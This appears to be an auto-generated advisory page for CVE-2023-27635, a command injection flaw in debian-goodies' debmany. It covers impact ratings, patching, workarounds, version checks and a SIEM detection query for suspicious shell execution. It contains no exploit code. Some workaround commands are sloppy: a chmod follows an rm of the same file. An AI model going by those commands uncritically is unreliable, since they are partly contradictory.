CVE-2023-27635 – CVE-2023-27635 is a command injection vulnerabi... (How to Fix)

📋 TL;DR

CVE-2023-27635 is a command injection vulnerability in debmany (part of debian-goodies) that allows attackers to execute arbitrary shell commands via a malicious .deb file. This affects systems where debmany is installed and processes untrusted .deb files. The vulnerability exists because debmany uses eval() on user-controlled input without proper sanitization.

💻 Affected Systems

Products:

debian-goodies

Versions: 0.88.1 and earlier

Operating Systems: Debian, Ubuntu, other Debian-based distributions

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects systems where debmany is installed and used to process .deb files. The vulnerability requires user interaction to process a malicious .deb file.

📦 What is this software?

Debmany by Debian

View all CVEs affecting Debmany →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Full system compromise with root privileges if attacker can trick user into processing malicious .deb file, leading to complete control of the affected system.

🟠

Likely Case

Local privilege escalation or arbitrary code execution when users process .deb files from untrusted sources, potentially leading to data theft or further lateral movement.

🟢

If Mitigated

Limited impact if users only process .deb files from trusted sources and follow security best practices.

🌐 Internet-Facing: LOW - debmany is typically used locally and not exposed directly to internet-facing services.

🏢 Internal Only: MEDIUM - Risk exists when users process .deb files from untrusted internal sources or external media.

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires user to process a crafted .deb file. The path is shown to user before execution, providing some warning but not preventing exploitation.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 0.88.2 or later

Vendor Advisory: https://bugs.debian.org/1031267

Restart Required: No

Instructions:

1. Update debian-goodies package: sudo apt update && sudo apt upgrade debian-goodies
2. Verify installation: dpkg -l | grep debian-goodies
3. Confirm version is 0.88.2 or higher

🔧 Temporary Workarounds

Remove debmany script

linux

Temporarily remove or disable the vulnerable debmany script

sudo rm /usr/bin/debmany
sudo chmod 000 /usr/bin/debmany

Use alternative .deb inspection tools

linux

Use dpkg-deb or other tools instead of debmany

dpkg-deb -c package.deb
dpkg-deb -I package.deb

🧯 If You Can't Patch

Avoid processing .deb files from untrusted sources
Implement strict file integrity checks for .deb files before processing

🔍 How to Verify

Check if Vulnerable:

Check debian-goodies version: dpkg -l debian-goodies | grep ^ii

Check Version:

dpkg -l debian-goodies | grep ^ii | awk '{print $3}'

Verify Fix Applied:

Verify version is 0.88.2 or higher: dpkg -l debian-goodies | grep '0.88.[2-9]\|0.89'

📡 Detection & Monitoring

Log Indicators:

Unusual process execution from debmany
Suspicious shell commands in process logs following .deb file processing

Network Indicators:

Unexpected outbound connections after .deb file processing

SIEM Query:

process.name:"debmany" AND process.cmdline:*eval* OR process.cmdline:*sh*

📊 Metadata

CVE ID: CVE-2023-27635

CVSS v3 Score: 7.8 (HIGH)

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE: CWE-74

Published: March 5, 2023

Last Updated: November 21, 2024

🔗 References

https://bugs.debian.org/1031267 Vendor Advisory
https://bugs.debian.org/1031267 Vendor Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-27635, you might also want to check these: